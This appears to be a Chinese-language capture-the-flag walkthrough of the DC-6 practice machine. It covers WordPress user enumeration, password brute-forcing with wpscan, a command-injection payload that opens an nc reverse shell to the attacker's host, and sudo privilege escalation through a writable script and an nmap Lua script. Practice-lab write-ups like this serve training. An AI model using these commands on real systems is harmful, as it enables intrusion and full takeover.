DC-6 靶机

DC_6

信息搜集

存活检测

详细扫描

需要添加 DNS 解析

bash 复制代码
vim /etc/hosts

后台网页扫描

bash 复制代码
dirsearch -u http://10.4.7.150

网页信息搜集

  • 使用 wappalyzer 插件识别 cms 指纹,发现为熟悉的 WordPress

  • 并且发现了网站的登陆页面

  • 直接上 wpscan

    扫描用户

    bash 复制代码
    wpscan --url http://wordy --enumerate u 

    扫描出如下用户,将用户写入 users 文件中以供爆破

  • 尝试 cewl 生成密码字典

  • 爆破

  • 爆破失败

  • rockyou 字典爆破

    dc6 官网上提示过滤一些密码可以提升爆破速度

    bash 复制代码
    cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
    bash 复制代码
    wpscan --url http://wordy --passwords passwords.txt --usernames users
  • 成功爆破

    用户名 mark

    密码 helpdesk01

  • 登录网页

Webshell

  • 搜索框内尝试命令注入

  • kali 开启 nc 监听

  • 输入连接反弹 shell 的命令

    bash 复制代码
    10.1.1.1|nc -e /bin/bash 10.4.7.146 7777

    有长度限制

  • 修改源码中允许的最大长度

    输入反弹命令,点击 Lookup 连接

  • 成功反弹

ssh登录

  • 反弹成功后搜集系统中有用信息

    在 /hoomr/mark/stuff 下发现了包含 graham 密码的文件

    密码为 GSo7isUM1D4

    尝试 ssh 登录

  • 成功登录

提权

  • sudo -l 查看权限

  • 发现 jens 可以无需密码以 root 权限运行 /home/jens/backups.sh

  • 查看 backup.sh 文件

    发现是一个压缩命令

  • 查看文件权限

    所属组拥有全部权限

  • 查看 graham 信息

    发现与 jens 同属一个组,拥有对文件的修改权限

  • 向文件中写入提权命令

    bash 复制代码
    echo bash >> backups.sh
  • sudo 执行

    bash 复制代码
    sudo -u jens /home/jens/backups.sh
  • 切换到 jens 用户

  • sudo -l 查看 root 权限

  • nmap 提权

    bash 复制代码
    TF=$(mktemp)
    echo 'os.execute("/bin/sh")' > $TF
    sudo nmap --script=$TF
  • 提权成功

总结

  • 命令注入,绕过
  • wpscan 用户扫描,密码爆破
  • nmap 提权
相关推荐
七歌杜金房10 小时前
我终于又有了自己的 Linux 电脑
linux·debian·mac
泯泷15 小时前
第 2 篇:设计第一套字节码:Opcode、Instruction 与 Constant Pool
前端·javascript·安全
泯泷15 小时前
第 1 篇:从 1 + 2 开始:亲手写出第一台 JSVM
前端·javascript·安全
tntxia1 天前
linux curl命令详解_curl详解
linux
扛枪的书生2 天前
Linux 网络管理器用法速查
linux
顺风尿一寸2 天前
Java Socket 内核之旅:从 SocketChannel.read() 到 tcp_recvmsg 与 epoll 的完整调用链路
linux
XIAOHEZIcode2 天前
Ubuntu 终端美化全栈指南:Bash 到 Kitty 踩坑实录
linux·ubuntu·命令行
唐青枫2 天前
别再只会用 cron:Linux systemd Timer 定时任务实战详解
linux
AlfredZhao4 天前
生产环境里,为什么不建议把普通端口直接暴露到公网?
linux·https·443·80
Flynt5 天前
npm v12 来了:allowScripts 默认关闭,我的项目差点跑不起来
安全·npm·node.js